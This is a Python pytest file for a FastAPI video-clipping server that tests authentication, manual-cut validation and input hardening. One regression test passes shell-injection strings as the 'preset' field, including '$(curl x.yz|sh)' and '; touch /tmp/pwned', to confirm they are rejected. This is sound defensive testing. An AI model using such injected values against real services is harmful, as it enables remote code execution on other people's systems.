import hmac
import json
import os
import pathlib
import shutil
import subprocess
from typing import Any, Dict, List
from unittest.mock import MagicMock, patch

import boto3
import pytest
from fastapi import HTTPException
from fastapi.security import HTTPAuthorizationCredentials
from fastapi.testclient import TestClient

import local_server
from core import schemas
from core.schemas import ClipItem, MomentsExtraction
from core.transcription import WhisperTranscriber
from local_server import app
from tests.manual_cuts_fixture import (
    FIXTURE_CUT_COUNT,
    FIXTURE_MAX_CUT_END_SECONDS,
    load_manual_cuts_payload,
)

client = TestClient(app)

AUTH_HEADERS = {"Authorization": "Bearer test-secret"}


def test_health_check():
    response = client.get("/")
    assert response.status_code == 200
    assert response.json() == {"status": "ok"}


def test_download_youtube_requires_auth_token():
    response = client.post(
        "/download_youtube", json={"url": "https://www.youtube.com/watch?v=dQw4w9WgXcQ"}
    )
    assert response.status_code in (401, 403)


def test_download_youtube_rejects_wrong_auth_token():
    with patch.dict(os.environ, {"AUTH_TOKEN": "test-secret"}):
        response = client.post(
            "/download_youtube",
            json={"url": "https://www.youtube.com/watch?v=dQw4w9WgXcQ"},
            headers={"Authorization": "Bearer wrong-token"},
        )
        assert response.status_code == 401


def test_download_youtube_endpoint():
    # Use a dummy invalid URL to just check the route existence and validation
    with patch.dict(os.environ, {"AUTH_TOKEN": "test-secret"}):
        response = client.post(
            "/download_youtube",
            json={"url": "invalid", "uploaded_file_id": "123"},
            headers=AUTH_HEADERS,
        )
        # Assuming it throws an error internally or returns a mock success if we patch it
        assert response.status_code in [200, 400, 500]


def test_download_youtube_success_mocked(monkeypatch):
    import subprocess

    def mock_run(*args, **kwargs):
        return subprocess.CompletedProcess(args=args[0], returncode=0)

    monkeypatch.setattr(subprocess, "run", mock_run)

    with patch.dict(os.environ, {"AUTH_TOKEN": "test-secret"}):
        response = client.post(
            "/download_youtube",
            json={"url": "https://www.youtube.com/watch?v=dQw4w9WgXcQ", "s3_bucket": "test-bucket"},
            headers=AUTH_HEADERS,
        )
    assert response.status_code == 200
    data = response.json()
    assert data["success"] is True
    assert "s3_key" in data
    assert "video_url" in data
    assert data["title"] == "Local Video"
    assert data["duration"] == 60
    assert data["durationSeconds"] == 60


def test_download_youtube_missing_url():
    with patch.dict(os.environ, {"AUTH_TOKEN": "test-secret"}):
        response = client.post(
            "/download_youtube", json={"uploaded_file_id": "123"}, headers=AUTH_HEADERS
        )
        assert response.status_code == 422


def test_process_video_requires_auth_token():
    response = client.post("/process_video", json={
        "video_url": "/tmp/fake.mp4",
        "uploaded_file_id": "123",
        "user_id": "user123"
    })
    assert response.status_code in (401, 403)


def test_process_video_endpoint():
    with patch.dict(os.environ, {"AUTH_TOKEN": "test-secret"}):
        response = client.post(
            "/process_video",
            json={
                "video_url": "/tmp/fake.mp4",
                "uploaded_file_id": "123",
                "user_id": "user123"
            },
            headers=AUTH_HEADERS,
        )
        # As long as it hits the endpoint and fails with validation or internal logic, route exists
        assert response.status_code in [200, 422, 500]


# ---------------------------------------------------------------------------
# POST /process_video v2 — manual cuts (spec 2026-10-09 contract v2, sections 6,
# 9 and 10). Phase 1 (RED): these tests must fail until the contract is
# implemented in core/schemas.py, core/video_pipeline.py and local_server.py.
#
# Scope of the mocks: WhisperX (transcriber), Gemini (identify_moments), LR-ASD,
# vertical reframe, subtitles and S3 upload are mocked. The real video is a
# short file generated by ffmpeg, so the cut and the ffprobe duration check
# run for real. The payload comes from tests/fixtures/manual_cuts_payload.json;
# only `s3_key` is replaced with the local file path (test-only substitution).
# ---------------------------------------------------------------------------

REQUIRES_FFMPEG = pytest.mark.skipif(
    shutil.which("ffmpeg") is None or shutil.which("ffprobe") is None,
    reason="ffmpeg/ffprobe are required to generate and probe a real test video",
)

SAMPLE_VIDEO_DURATION_SECONDS = 15

TRANSCRIPT_SEGMENTS: List[Dict[str, Any]] = [
    {"start": 0.0, "end": 0.4, "word": "Olá"},
    {"start": 0.5, "end": 0.9, "word": "pessoal"},
    {"start": 1.0, "end": 1.6, "word": "bem-vindos"},
]


@pytest.fixture(scope="session")
def sample_video_path(tmp_path_factory: pytest.TempPathFactory) -> pathlib.Path:
    video_path = tmp_path_factory.mktemp("videos") / "sample-podcast.mp4"
    subprocess.run(
        [
            "ffmpeg", "-y",
            "-f", "lavfi", "-i",
            f"testsrc=duration={SAMPLE_VIDEO_DURATION_SECONDS}:size=320x240:rate=10",
            "-f", "lavfi", "-i",
            f"sine=frequency=440:duration={SAMPLE_VIDEO_DURATION_SECONDS}",
            "-c:v", "mpeg4", "-c:a", "aac", "-shortest",
            str(video_path),
        ],
        check=True,
        capture_output=True,
    )
    return video_path


@pytest.fixture
def pipeline_env(
    monkeypatch: pytest.MonkeyPatch, sample_video_path: pathlib.Path
) -> Dict[str, Any]:
    from core import clip_pipeline, video_pipeline

    monkeypatch.setenv("AUTH_TOKEN", "test-secret")
    monkeypatch.setattr(local_server, "models_loaded", True)

    transcriber: WhisperTranscriber = MagicMock(spec=WhisperTranscriber)
    transcriber.transcribe.return_value = json.dumps(TRANSCRIPT_SEGMENTS)
    monkeypatch.setattr(local_server.video_processor, "transcriber", transcriber)
    monkeypatch.setattr(local_server.video_processor, "gemini_client", MagicMock())

    identify_moments = MagicMock(
        return_value=MomentsExtraction(
            clips=[
                ClipItem(
                    title="Gancho do Gemini",
                    hook="gancho",
                    start=2.0,
                    end=20.0,
                    virality_score=7,
                    reason="motivo",
                )
            ]
        )
    )
    monkeypatch.setattr(video_pipeline, "identify_moments", identify_moments)

    monkeypatch.setattr(
        clip_pipeline,
        "run_active_speaker_detection",
        MagicMock(return_value=([], [])),
    )
    monkeypatch.setattr(clip_pipeline, "create_vertical_video", MagicMock())
    monkeypatch.setattr(clip_pipeline, "create_subtitles_with_ffmpeg", MagicMock())
    monkeypatch.setattr(boto3, "client", MagicMock(return_value=MagicMock()))

    return {
        "transcriber": transcriber,
        "identify_moments": identify_moments,
        "video_path": sample_video_path,
    }


def _payload_for_local_file(video_path: pathlib.Path) -> Dict[str, Any]:
    payload = load_manual_cuts_payload()
    payload["s3_key"] = str(video_path)
    return payload


@REQUIRES_FFMPEG
class TestProcessVideoManualCutsIntegration:
    def test_manual_cuts_return_clips_at_requested_timestamps(self, pipeline_env):
        payload = _payload_for_local_file(pipeline_env["video_path"])

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 200
        clips = response.json()["clips"]
        assert len(clips) == FIXTURE_CUT_COUNT
        assert [(clip["start"], clip["end"]) for clip in clips] == [
            (0.0, 4.0),
            (4.0, 9.5),
            (8.0, 12.0),
        ]
        assert [clip["title"] for clip in clips] == [
            "Abertura",
            "Manual clip 2",
            "Corte sobreposto",
        ]
        assert all(clip["virality_score"] is None for clip in clips)

    def test_manual_mode_skips_gemini_but_still_transcribes(self, pipeline_env):
        payload = _payload_for_local_file(pipeline_env["video_path"])

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 200
        pipeline_env["identify_moments"].assert_not_called()
        pipeline_env["transcriber"].transcribe.assert_called_once()

    def test_manual_cut_exceeding_real_video_duration_returns_422(self, pipeline_env):
        # RN-PIPE-MANUAL-06: the video is 15s long, the cut ends at 20s.
        assert FIXTURE_MAX_CUT_END_SECONDS < SAMPLE_VIDEO_DURATION_SECONDS
        payload = _payload_for_local_file(pipeline_env["video_path"])
        payload["manual_cuts"][-1]["end"] = 20.0

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 422
        pipeline_env["transcriber"].transcribe.assert_not_called()

    def test_unknown_field_returns_422(self, pipeline_env):
        # RN-PIPE-MANUAL-13 / D2
        payload = _payload_for_local_file(pipeline_env["video_path"])
        payload["video_url"] = "https://example.com/podcast.mp4"

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 422

    def test_manual_mode_without_cuts_returns_422(self, pipeline_env):
        # RN-PIPE-MANUAL-02 / D5: never falls back to the automatic path.
        payload = _payload_for_local_file(pipeline_env["video_path"])
        payload["manual_cuts"] = []

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 422
        pipeline_env["identify_moments"].assert_not_called()

    def test_auto_mode_with_manual_cuts_returns_422(self, pipeline_env):
        # RN-PIPE-MANUAL-03
        payload = _payload_for_local_file(pipeline_env["video_path"])
        payload["mode"] = "auto"

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 422

    @pytest.mark.parametrize(
        "preset", ["$(curl x.yz|sh)", "`id`", "HORMOZI; touch /tmp/pwned"]
    )
    def test_shell_metachar_preset_returns_422_before_pipeline(self, pipeline_env, preset):
        # RCE regression: preset used to reach a shell=True ffmpeg command.
        payload = _payload_for_local_file(pipeline_env["video_path"])
        payload["preset"] = preset

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 422
        pipeline_env["transcriber"].transcribe.assert_not_called()

    def test_legacy_payload_without_mode_still_runs_automatic_path(self, pipeline_env):
        # Green guard, RN-PIPE-MANUAL-14: a caller with only s3_key/preset keeps working.
        payload = {"s3_key": str(pipeline_env["video_path"]), "preset": "HORMOZI"}

        response = client.post("/process_video", json=payload, headers=AUTH_HEADERS)

        assert response.status_code == 200
        pipeline_env["identify_moments"].assert_called_once()
        clips = response.json()["clips"]
        assert len(clips) == 1
        assert clips[0]["title"] == "Gancho do Gemini"
        assert clips[0]["start"] == 2.0
        assert clips[0]["end"] == 20.0


# ---------------------------------------------------------------------------
# RNF-SEC-07 — local_server.verify_auth_token bearer comparison must be
# constant-time. This is the local_server half of the auth suite; the
# main.process_video / main.download_youtube half lives in
# tests/test_auth_token_constant_time.py, which runs in the lean `backend` CI
# job (only requirements-test.txt, no torch). local_server.py does
# compatibility monkey-patching of pyannote/whisperx/torch at import time, so
# it can only be imported where torch/torchaudio are installed — i.e. here,
# in the job that installs the full requirements.txt.
# ---------------------------------------------------------------------------


def _auth_creds(value: str) -> HTTPAuthorizationCredentials:
    return HTTPAuthorizationCredentials(scheme="Bearer", credentials=value)


def _call_verify_auth_token(token: str) -> None:
    local_server.verify_auth_token(_auth_creds(token))


def _assert_401(token: str) -> None:
    with pytest.raises(HTTPException) as exc_info:
        _call_verify_auth_token(token)
    assert exc_info.value.status_code == 401


class TestVerifyAuthTokenConstantTime:
    SECRET = "test-secret"

    @pytest.fixture
    def compare_digest_spy(self, monkeypatch: pytest.MonkeyPatch):
        real = hmac.compare_digest
        spy = MagicMock(side_effect=real)
        monkeypatch.setattr(hmac, "compare_digest", spy)
        return spy

    def test_correct_token_is_accepted_via_compare_digest(self, monkeypatch, compare_digest_spy):
        monkeypatch.setenv("AUTH_TOKEN", self.SECRET)
        _call_verify_auth_token(self.SECRET)  # must not raise
        compare_digest_spy.assert_called()

    def test_wrong_token_is_rejected_via_compare_digest(self, monkeypatch, compare_digest_spy):
        monkeypatch.setenv("AUTH_TOKEN", self.SECRET)
        _assert_401("wrong-token")
        compare_digest_spy.assert_called()

    def test_rejects_any_token_when_auth_token_not_configured(self, monkeypatch):
        monkeypatch.delenv("AUTH_TOKEN", raising=False)
        _assert_401(self.SECRET)
        _assert_401("")

    def test_rejects_empty_token_when_auth_token_is_empty(self, monkeypatch):
        monkeypatch.setenv("AUTH_TOKEN", "")
        _assert_401("")

    def test_non_ascii_token_is_rejected_with_401_not_500(self, monkeypatch):
        monkeypatch.setenv("AUTH_TOKEN", self.SECRET)
        _assert_401("tést-secret")


# ---------------------------------------------------------------------------
# Manual cut input hardening (Phase 3 audit of the POST /process_video v2
# contract) — HTTP-level guard on the local runner. Moved here (out of
# tests/test_manual_cut_input_hardening.py, which runs in the lean `backend`
# CI job) because it imports local_server, which needs torch/torchaudio to
# import at all.
# ---------------------------------------------------------------------------


class TestProcessVideoEndpointRejectsHostileCutsWith422:
    """HTTP-level guard on the local runner: invalid cuts must be a 422 from
    the request contract, never reach the pipeline (no GPU time spent) and
    never be masked as 500 by the endpoint's generic `except Exception`."""

    @pytest.fixture
    def client_and_pipeline(self, monkeypatch):
        monkeypatch.setenv("AUTH_TOKEN", "test-secret")
        with patch.object(local_server.video_processor, "process_video") as process_video, \
                patch.object(local_server.video_processor, "load_model"):
            yield TestClient(local_server.app), process_video

    def _post_raw(self, client, raw_body: str):
        return client.post(
            "/process_video",
            content=raw_body,
            headers={
                "Authorization": "Bearer test-secret",
                "Content-Type": "application/json",
            },
        )

    @pytest.mark.parametrize("literal", ["NaN", "Infinity", "-Infinity"])
    def test_non_finite_end_literal_never_reaches_pipeline(self, client_and_pipeline, literal):
        # Known limitation (reported, not fixed here): the request IS rejected
        # by the contract, but FastAPI's default RequestValidationError handler
        # echoes the offending `input` (a non-finite float) back in the 422
        # body, and Starlette's JSONResponse refuses to serialize NaN/Inf
        # (allow_nan=False) — so the client sees a 500, not a 422. What this
        # test guarantees is the security-relevant part: the request is never
        # accepted (no 2xx) and never reaches the GPU pipeline.
        # The frontend can't trigger this: JSON.stringify(NaN) emits `null`.
        client, process_video = client_and_pipeline
        client = TestClient(client.app, raise_server_exceptions=False)
        raw = (
            '{"s3_key": "uploads/u/x/podcast.mp4", "mode": "manual", '
            '"manual_cuts": [{"start": 0, "end": ' + literal + "}]}"
        )

        response = self._post_raw(client, raw)

        assert response.status_code in (422, 500)
        process_video.assert_not_called()

    def test_oversized_title_returns_422(self, client_and_pipeline):
        client, process_video = client_and_pipeline
        payload = {
            "s3_key": "uploads/u/x/podcast.mp4",
            "mode": "manual",
            "manual_cuts": [{"start": 0, "end": 5, "title": "x" * 201}],
        }

        response = client.post(
            "/process_video",
            json=payload,
            headers={"Authorization": "Bearer test-secret"},
        )

        assert response.status_code == 422
        process_video.assert_not_called()

    def test_more_than_max_cuts_returns_422(self, client_and_pipeline):
        client, process_video = client_and_pipeline
        payload = {
            "s3_key": "uploads/u/x/podcast.mp4",
            "mode": "manual",
            "manual_cuts": [
                {"start": 0, "end": 5} for _ in range(schemas.MAX_MANUAL_CUTS + 1)
            ],
        }

        response = client.post(
            "/process_video",
            json=payload,
            headers={"Authorization": "Bearer test-secret"},
        )

        assert response.status_code == 422
        process_video.assert_not_called()
